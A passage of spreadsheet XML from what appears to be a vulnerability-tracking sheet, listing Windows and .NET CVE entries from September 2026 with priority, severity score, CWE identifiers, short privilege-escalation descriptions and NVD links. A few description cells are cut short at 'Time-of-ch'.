        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1343" s="5" t="inlineStr"/>
      <c r="K1343" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1343" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="C1344" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1344" s="5" t="inlineStr"/>
      <c r="F1344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1344" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1344" s="5" t="inlineStr"/>
      <c r="I1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1344" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="C1345" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1345" s="5" t="inlineStr"/>
      <c r="F1345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1345" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1345" s="5" t="inlineStr"/>
      <c r="I1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1345" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="C1346" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1346" s="5" t="inlineStr"/>
      <c r="F1346" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1346" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1346" s="5" t="inlineStr"/>
      <c r="I1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1346" s="5" t="inlineStr"/>
      <c r="K1346" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L1346" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69692</t>
        </is>
      </c>
      <c r="C1347" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1347" s="5" t="inlineStr"/>
      <c r="F1347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1347" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1347" s="5" t="inlineStr"/>
      <c r="I1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1347" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69692</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69693</t>
        </is>
      </c>
      <c r="C1348" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1348" s="5" t="inlineStr"/>
      <c r="F1348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1348" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1348" s="5" t="inlineStr"/>
      <c r="I1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1348" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Broker service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69693</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69694</t>
        </is>
      </c>
      <c r="C1349" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1349" s="5" t="inlineStr"/>
      <c r="F1349" s="5" t="n">
        <v>0.017</v>
      </c>
      <c r="G1349" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1349" s="5" t="inlineStr"/>
      <c r="I1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1349" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in Windows IP Address Management (IPAM) Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69694</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69708</t>
        </is>
      </c>
      <c r="C1350" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1350" s="5" t="inlineStr"/>
      <c r="F1350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1350" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1350" s="5" t="inlineStr"/>
      <c r="I1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1350" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Web Platform Storage allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69708</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69711</t>
        </is>
      </c>
      <c r="C1351" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1351" s="5" t="inlineStr"/>
      <c r="F1351" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1351" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1351" s="5" t="inlineStr"/>
      <c r="I1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1351" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69711</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69735</t>
        </is>
      </c>
      <c r="C1352" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1352" s="5" t="inlineStr"/>
      <c r="F1352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1352" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1352" s="5" t="inlineStr"/>
      <c r="I1352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1352" s="5" t="inlineStr"/>
      <c r="K1352" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1352" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Broadcast DVR User Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69735</t>
        </is>
      </c>
    </row>
    <row r="1353">
      <c r="A1353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69779</t>
        </is>
      </c>
      <c r="C1353" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1353" s="5" t="inlineStr"/>
      <c r="F1353" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1353" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1353" s="5" t="inlineStr"/>
      <c r="I1353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1353" s="5" t="inlineStr"/>
      <c r="K1353" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1353" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69779</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69791</t>
        </is>
      </c>
      <c r="C1354" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1354" s="5" t="inlineStr"/>
      <c r="F1354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1354" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1354" s="5" t="inlineStr"/>
      <c r="I1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1354" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69791</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69806</t>
        </is>
      </c>
      <c r="C1355" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1355" s="5" t="inlineStr"/>
      <c r="F1355" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G1355" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1355" s="5" t="inlineStr"/>
      <c r="I1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-94</t>
        </is>
      </c>
      <c r="L1355" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive information to an unauthorized actor in .NET allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69806</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="C1356" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1356" s="5" t="inlineStr"/>
      <c r="F1356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1356" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1356" s="5" t="inlineStr"/>
      <c r="I1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1356" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="C1357" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1357" s="5" t="inlineStr"/>
      <c r="F1357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1357" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1357" s="5" t="inlineStr"/>
      <c r="I1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1357" s="5" t="inlineStr"/>
      <c r="K1357" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1357" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="C1358" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1358" s="5" t="inlineStr"/>
      <c r="F1358" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1358" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1358" s="5" t="inlineStr"/>
      <c r="I1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1358" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="C1359" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1359" s="5" t="inlineStr"/>
      <c r="F1359" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1359" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1359" s="5" t="inlineStr"/>
      <c r="I1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1359" s="5" t="inlineStr"/>
      <c r="K1359" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1359" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="C1360" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1360" s="5" t="inlineStr"/>
      <c r="F1360" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1360" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1360" s="5" t="inlineStr"/>
      <c r="I1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1360" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="C1361" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1361" s="5" t="inlineStr"/>
      <c r="F1361" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1361" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1361" s="5" t="inlineStr"/>
      <c r="I1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1361" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="C1362" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1362" s="5" t="inlineStr"/>
      <c r="F1362" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1362" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1362" s="5" t="inlineStr"/>
      <c r="I1362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="L1362" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M1362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="C1363" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1363" s="5" t="inlineStr"/>
      <c r="F1363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1363" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1363" s="5" t="inlineStr"/>
      <c r="I1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1363" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="C1364" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1364" s="5" t="inlineStr"/>
      <c r="F1364" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1364" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1364" s="5" t="inlineStr"/>
      <c r="I1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1364" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="C1365" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1365" s="5" t="inlineStr"/>
      <c r="F1365" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1365" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1365" s="5" t="inlineStr"/>
      <c r="I1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1365" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="C1366" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1366" s="5" t="inlineStr"/>
      <c r="F1366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1366" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1366" s="5" t="inlineStr"/>
      <c r="I1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1366" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="C1367" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1367" s="5" t="inlineStr"/>
      <c r="F1367" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1367" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1367" s="5" t="inlineStr"/>
      <c r="I1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1367" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="C1368" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D1368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
